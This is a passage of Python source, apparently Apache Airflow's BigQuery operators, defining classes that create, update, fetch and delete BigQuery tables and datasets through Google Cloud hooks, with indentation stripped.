account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param exists_ok: If ``True``, ignore "already exists" errors when creating the table.
:type exists_ok: bool
"""
template_fields = (
'dataset_id',
'table_id',
'project_id',
'gcs_schema_object',
'labels',
'view',
'materialized_view',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json", "materialized_view": "json"}
ui_color = BigQueryUIColors.TABLE.value
# pylint: disable=too-many-arguments
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_id: str,
table_resource: Optional[Dict[str, Any]] = None,
project_id: Optional[str] = None,
schema_fields: Optional[List] = None,
gcs_schema_object: Optional[str] = None,
time_partitioning: Optional[Dict] = None,
bigquery_conn_id: str = 'google_cloud_default',
google_cloud_storage_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
labels: Optional[Dict] = None,
view: Optional[Dict] = None,
materialized_view: Optional[Dict] = None,
encryption_configuration: Optional[Dict] = None,
location: Optional[str] = None,
cluster_fields: Optional[List[str]] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
exists_ok: bool = False,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.project_id = project_id
self.dataset_id = dataset_id
self.table_id = table_id
self.schema_fields = schema_fields
self.gcs_schema_object = gcs_schema_object
self.bigquery_conn_id = bigquery_conn_id
self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
self.delegate_to = delegate_to
self.time_partitioning = {} if time_partitioning is None else time_partitioning
self.labels = labels
self.view = view
self.materialized_view = materialized_view
self.encryption_configuration = encryption_configuration
self.location = location
self.cluster_fields = cluster_fields
self.table_resource = table_resource
self.impersonation_chain = impersonation_chain
self.exists_ok = exists_ok
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if not self.schema_fields and self.gcs_schema_object:
gcs_bucket, gcs_object = _parse_gcs_url(self.gcs_schema_object)
gcs_hook = GCSHook(
gcp_conn_id=self.google_cloud_storage_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
schema_fields = json.loads(gcs_hook.download(gcs_bucket, gcs_object))
else:
schema_fields = self.schema_fields
try:
self.log.info('Creating table')
table = bq_hook.create_empty_table(
project_id=self.project_id,
dataset_id=self.dataset_id,
table_id=self.table_id,
schema_fields=schema_fields,
time_partitioning=self.time_partitioning,
cluster_fields=self.cluster_fields,
labels=self.labels,
view=self.view,
materialized_view=self.materialized_view,
encryption_configuration=self.encryption_configuration,
table_resource=self.table_resource,
exists_ok=self.exists_ok,
)
self.log.info(
'Table %s.%s.%s created successfully', table.project, table.dataset_id, table.table_id
)
except Conflict:
self.log.info('Table %s.%s already exists.', self.dataset_id, self.table_id)
# pylint: disable=too-many-instance-attributes
class BigQueryCreateExternalTableOperator(BaseOperator):
"""
Creates a new external table in the dataset with the data from Google Cloud
Storage.
The schema to be used for the BigQuery table may be specified in one of
two ways. You may either directly pass the schema fields in, or you may
point the operator to a Google Cloud Storage object name. The object in
Google Cloud Storage must be a JSON file with the schema fields in it.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryCreateExternalTableOperator`
:param bucket: The bucket to point the external table to. (templated)
:type bucket: str
:param source_objects: List of Google Cloud Storage URIs to point
table to. If source_format is 'DATASTORE_BACKUP', the list must only contain a single URI.
:type source_objects: list
:param destination_project_dataset_table: The dotted ``(<project>.)<dataset>.<table>``
BigQuery table to load data into (templated). If ``<project>`` is not included,
project will be the project defined in the connection json.
:type destination_project_dataset_table: str
:param schema_fields: If set, the schema field list as defined here:
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load.schema
**Example**: ::
schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
{"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}]
Should not be set when source_format is 'DATASTORE_BACKUP'.
:param table_resource: Table resource as described in documentation:
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table
If provided all other parameters are ignored. External schema from object will be resolved.
:type table_resource: Dict[str, Any]
:type schema_fields: list
:param schema_object: If set, a GCS object path pointing to a .json file that
contains the schema for the table. (templated)
:type schema_object: str
:param source_format: File format of the data.
:type source_format: str
:param compression: [Optional] The compression type of the data source.
Possible values include GZIP and NONE.
The default value is NONE.
This setting is ignored for Google Cloud Bigtable,
Google Cloud Datastore backups and Avro formats.
:type compression: str
:param skip_leading_rows: Number of rows to skip when loading from a CSV.
:type skip_leading_rows: int
:param field_delimiter: The delimiter to use for the CSV.
:type field_delimiter: str
:param max_bad_records: The maximum number of bad records that BigQuery can
ignore when running the job.
:type max_bad_records: int
:param quote_character: The value that is used to quote data sections in a CSV file.
:type quote_character: str
:param allow_quoted_newlines: Whether to allow quoted newlines (true) or not (false).
:type allow_quoted_newlines: bool
:param allow_jagged_rows: Accept rows that are missing trailing optional columns.
The missing values are treated as nulls. If false, records with missing trailing
columns are treated as bad records, and if there are too many bad records, an
invalid error is returned in the job result. Only applicable to CSV, ignored
for other formats.
:type allow_jagged_rows: bool
:param bigquery_conn_id: (Optional) The connection ID used to connect to Google Cloud and
interact with the Bigquery service.
:type bigquery_conn_id: str
:param google_cloud_storage_conn_id: (Optional) The connection ID used to connect to Google Cloud
and interact with the Google Cloud Storage service.
:type google_cloud_storage_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param src_fmt_configs: configure optional fields specific to the source format
:type src_fmt_configs: dict
:param labels: a dictionary containing labels for the table, passed to BigQuery
:type labels: dict
:param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).
**Example**: ::
encryption_configuration = {
"kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
}
:type encryption_configuration: dict
:param location: The location used for the operation.
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'bucket',
'source_objects',
'schema_object',
'destination_project_dataset_table',
'labels',
'table_resource',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
# pylint: disable=too-many-arguments,too-many-locals
@apply_defaults
def __init__(
self,
*,
bucket: str,
source_objects: List,
destination_project_dataset_table: str,
table_resource: Optional[Dict[str, Any]] = None,
schema_fields: Optional[List] = None,
schema_object: Optional[str] = None,
source_format: str = 'CSV',
compression: str = 'NONE',
skip_leading_rows: int = 0,
field_delimiter: str = ',',
max_bad_records: int = 0,
quote_character: Optional[str] = None,
allow_quoted_newlines: bool = False,
allow_jagged_rows: bool = False,
bigquery_conn_id: str = 'google_cloud_default',
google_cloud_storage_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
src_fmt_configs: Optional[dict] = None,
labels: Optional[Dict] = None,
encryption_configuration: Optional[Dict] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
# GCS config
self.bucket = bucket
self.source_objects = source_objects
self.schema_object = schema_object
# BQ config
kwargs_passed = any(
[
destination_project_dataset_table,
schema_fields,
source_format,
compression,
skip_leading_rows,
field_delimiter,
max_bad_records,
quote_character,
allow_quoted_newlines,
allow_jagged_rows,
src_fmt_configs,
labels,
encryption_configuration,
]
)
if not table_resource:
warnings.warn(
"Passing table parameters via keywords arguments will be deprecated. "
"Please use provide table definition using `table_resource` parameter."
"You can still use external `schema_object`. ",
DeprecationWarning,
stacklevel=2,
)
if table_resource and kwargs_passed:
raise ValueError("You provided both `table_resource` and exclusive keywords arguments.")
self.table_resource = table_resource
self.destination_project_dataset_table = destination_project_dataset_table
self.schema_fields = schema_fields
self.source_format = source_format
self.compression = compression
self.skip_leading_rows = skip_leading_rows
self.field_delimiter = field_delimiter
self.max_bad_records = max_bad_records
self.quote_character = quote_character
self.allow_quoted_newlines = allow_quoted_newlines
self.allow_jagged_rows = allow_jagged_rows
self.bigquery_conn_id = bigquery_conn_id
self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
self.delegate_to = delegate_to
self.src_fmt_configs = src_fmt_configs or {}
self.labels = labels
self.encryption_configuration = encryption_configuration
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if not self.schema_fields and self.schema_object and self.source_format != 'DATASTORE_BACKUP':
gcs_hook = GCSHook(
gcp_conn_id=self.google_cloud_storage_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
schema_fields = json.loads(gcs_hook.download(self.bucket, self.schema_object))
else:
schema_fields = self.schema_fields
if schema_fields and self.table_resource:
self.table_resource["externalDataConfiguration"]["schema"] = schema_fields
if self.table_resource:
tab_ref = TableReference.from_string(self.destination_project_dataset_table)
bq_hook.create_empty_table(
table_resource=self.table_resource,
project_id=tab_ref.project,
table_id=tab_ref.table_id,
dataset_id=tab_ref.dataset_id,
)
else:
source_uris = [f"gs://{self.bucket}/{source_object}" for source_object in self.source_objects]
bq_hook.create_external_table(
external_project_dataset_table=self.destination_project_dataset_table,
schema_fields=schema_fields,
source_uris=source_uris,
source_format=self.source_format,
compression=self.compression,
skip_leading_rows=self.skip_leading_rows,
field_delimiter=self.field_delimiter,
max_bad_records=self.max_bad_records,
quote_character=self.quote_character,
allow_quoted_newlines=self.allow_quoted_newlines,
allow_jagged_rows=self.allow_jagged_rows,
src_fmt_configs=self.src_fmt_configs,
labels=self.labels,
encryption_configuration=self.encryption_configuration,
)
class BigQueryDeleteDatasetOperator(BaseOperator):
"""
This operator deletes an existing dataset from your Project in Big query.
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/delete
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryDeleteDatasetOperator`
:param project_id: The project id of the dataset.
:type project_id: str
:param dataset_id: The dataset to be deleted.
:type dataset_id: str
:param delete_contents: (Optional) Whether to force the deletion even if the dataset is not empty.
Will delete all tables (if any) in the dataset if set to True.
Will raise HttpError 400: "{dataset_id} is still in use" if set to False and dataset is not empty.
The default value is False.
:type delete_contents: bool
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
**Example**: ::
delete_temp_data = BigQueryDeleteDatasetOperator(
dataset_id='temp-dataset',
project_id='temp-project',
delete_contents=True, # Force the deletion of the dataset as well as its tables (if any).
gcp_conn_id='_my_gcp_conn_',
task_id='Deletetemp',
dag=dag)
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
delete_contents: bool = False,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.project_id = project_id
self.delete_contents = delete_contents
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context) -> None:
self.log.info('Dataset id: %s Project id: %s', self.dataset_id, self.project_id)
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
bq_hook.delete_dataset(
project_id=self.project_id, dataset_id=self.dataset_id, delete_contents=self.delete_contents
)
class BigQueryCreateEmptyDatasetOperator(BaseOperator):
"""
This operator is used to create new dataset for your Project in BigQuery.
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryCreateEmptyDatasetOperator`
:param project_id: The name of the project where we want to create the dataset.
:type project_id: str
:param dataset_id: The id of dataset. Don't need to provide, if datasetId in dataset_reference.
:type dataset_id: str
:param location: The geographic location where the dataset should reside.
:type location: str
:param dataset_reference: Dataset reference that could be provided with request body.
More info:
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
:type dataset_reference: dict
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param exists_ok: If ``True``, ignore "already exists" errors when creating the dataset.
:type exists_ok: bool
**Example**: ::
create_new_dataset = BigQueryCreateEmptyDatasetOperator(
dataset_id='new-dataset',
project_id='my-project',
dataset_reference={"friendlyName": "New Dataset"}
gcp_conn_id='_my_gcp_conn_',
task_id='newDatasetCreator',
dag=dag)
"""
template_fields = (
'dataset_id',
'project_id',
'dataset_reference',
'impersonation_chain',
)
template_fields_renderers = {"dataset_reference": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: Optional[str] = None,
project_id: Optional[str] = None,
dataset_reference: Optional[Dict] = None,
location: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
exists_ok: bool = False,
**kwargs,
) -> None:
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.project_id = project_id
self.location = location
self.gcp_conn_id = gcp_conn_id
self.dataset_reference = dataset_reference if dataset_reference else {}
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
self.exists_ok = exists_ok
super().__init__(**kwargs)
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
try:
bq_hook.create_empty_dataset(
project_id=self.project_id,
dataset_id=self.dataset_id,
dataset_reference=self.dataset_reference,
location=self.location,
exists_ok=self.exists_ok,
)
except Conflict:
dataset_id = self.dataset_reference.get("datasetReference", {}).get("datasetId", self.dataset_id)
self.log.info('Dataset %s already exists.', dataset_id)
class BigQueryGetDatasetOperator(BaseOperator):
"""
This operator is used to return the dataset specified by dataset_id.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryGetDatasetOperator`
:param dataset_id: The id of dataset. Don't need to provide,
if datasetId in dataset_reference.
:type dataset_id: str
:param project_id: The name of the project where we want to create the dataset.
Don't need to provide, if projectId in dataset_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:rtype: dataset
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info('Start getting dataset: %s:%s', self.project_id, self.dataset_id)
dataset = bq_hook.get_dataset(dataset_id=self.dataset_id, project_id=self.project_id)
return dataset.to_api_repr()
class BigQueryGetDatasetTablesOperator(BaseOperator):
"""
This operator retrieves the list of tables in the specified dataset.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryGetDatasetTablesOperator`
:param dataset_id: the dataset ID of the requested dataset.
:type dataset_id: str
:param project_id: (Optional) the project of the requested dataset. If None,
self.project_id will be used.
:type project_id: str
:param max_results: (Optional) the maximum number of tables to return.
:type max_results: int
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
max_results: Optional[int] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.max_results = max_results
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.get_dataset_tables(
dataset_id=self.dataset_id,
project_id=self.project_id,
max_results=self.max_results,
)
class BigQueryPatchDatasetOperator(BaseOperator):
"""
This operator is used to patch dataset for your Project in BigQuery.
It only replaces fields that are provided in the submitted dataset resource.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryPatchDatasetOperator`
:param dataset_id: The id of dataset. Don't need to provide,
if datasetId in dataset_reference.
:type dataset_id: str
:param dataset_resource: Dataset resource that will be provided with request body.
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
:type dataset_resource: dict
:param project_id: The name of the project where we want to create the dataset.
Don't need to provide, if projectId in dataset_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:rtype: dataset
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"dataset_resource": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
dataset_resource: dict,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
warnings.warn(
"This operator is deprecated. Please use BigQueryUpdateDatasetOperator.",
DeprecationWarning,
stacklevel=3,
)
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.dataset_resource = dataset_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.patch_dataset(
dataset_id=self.dataset_id,
dataset_resource=self.dataset_resource,
project_id=self.project_id,
)
class BigQueryUpdateTableOperator(BaseOperator):
"""
This operator is used to update table for your Project in BigQuery.
Use ``fields`` to specify which fields of table to update. If a field
is listed in ``fields`` and is ``None`` in table, it will be deleted.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryUpdateTableOperator`
:param dataset_id: The id of dataset. Don't need to provide,
if datasetId in table_reference.
:param table_id: The id of table. Don't need to provide,
if tableId in table_reference.
:type table_id: str
:param table_resource: Dataset resource that will be provided with request body.
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#resource
:type table_resource: Dict[str, Any]
:param fields: The fields of ``table`` to change, spelled as the Table
properties (e.g. "friendly_name").
:type fields: List[str]
:param project_id: The name of the project where we want to create the table.
Don't need to provide, if projectId in table_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:rtype: table
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#resource
"""
template_fields = (
'dataset_id',
'table_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
table_resource: Dict[str, Any],
fields: Optional[List[str]] = None,
dataset_id: Optional[str] = None,
table_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.table_id = table_id
self.project_id = project_id
self.fields = fields
self.gcp_conn_id = gcp_conn_id
self.table_resource = table_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.update_table(
table_resource=self.table_resource,
fields=self.fields,
dataset_id=self.dataset_id,
table_id=self.table_id,
project_id=self.project_id,
)
class BigQueryUpdateDatasetOperator(BaseOperator):
"""
This operator is used to update dataset for your Project in BigQuery.
Use ``fields`` to specify which fields of dataset to update. If a field
is listed in ``fields`` and is ``None`` in dataset, it will be deleted.
If no ``fields`` are provided then all fields of provided ``dataset_resource``
will be used.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryUpdateDatasetOperator`
:param dataset_id: The id of dataset. Don't need to provide,
if datasetId in dataset_reference.
:type dataset_id: str
:param dataset_resource: Dataset resource that will be provided with request body.
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
:type dataset_resource: Dict[str, Any]
:param fields: The properties of dataset to change (e.g. "friendly_name").
:type fields: Sequence[str]
:param project_id: The name of the project where we want to create the dataset.
Don't need to provide, if projectId in dataset_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:rtype: dataset
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"dataset_resource": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_resource: Dict[str, Any],
fields: Optional[List[str]] = None,
dataset_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.fields = fields
self.gcp_conn_id = gcp_conn_id
self.dataset_resource = dataset_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
fields = self.fields or list(self.dataset_resource.keys())
dataset = bq_hook.update_dataset(
dataset_resource=self.dataset_resource,
project_id=self.project_id,
dataset_id=self.dataset_id,
fields=fields,
)
return dataset.to_api_repr()
class BigQueryDeleteTableOperator(BaseOperator):
"""
Deletes BigQuery tables
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryDeleteTableOperator`
:param deletion_dataset_table: A dotted
``(<project>.|<project>:)<dataset>.<table>`` that indicates which table
will be deleted. (templated)
:type deletion_dataset_table: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param ignore_if_missing: if True, then return success even if the
requested table does not exist.
:type ignore_if_missing: bool
:param location: The location used for the operation.
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'deletion_dataset_table',
'impersonation_chain',
)
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
deletion_dataset_table: str,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
ignore_if_missing: bool = False,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.deletion_dataset_table = deletion_dataset_table
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.ignore_if_missing = ignore_if_missing
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
self.log.info('Deleting: %s', self.deletion_dataset_table)
hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
hook.delete_table(table_id=self.deletion_dataset_table, not_found_ok=self.ignore_if_missing)
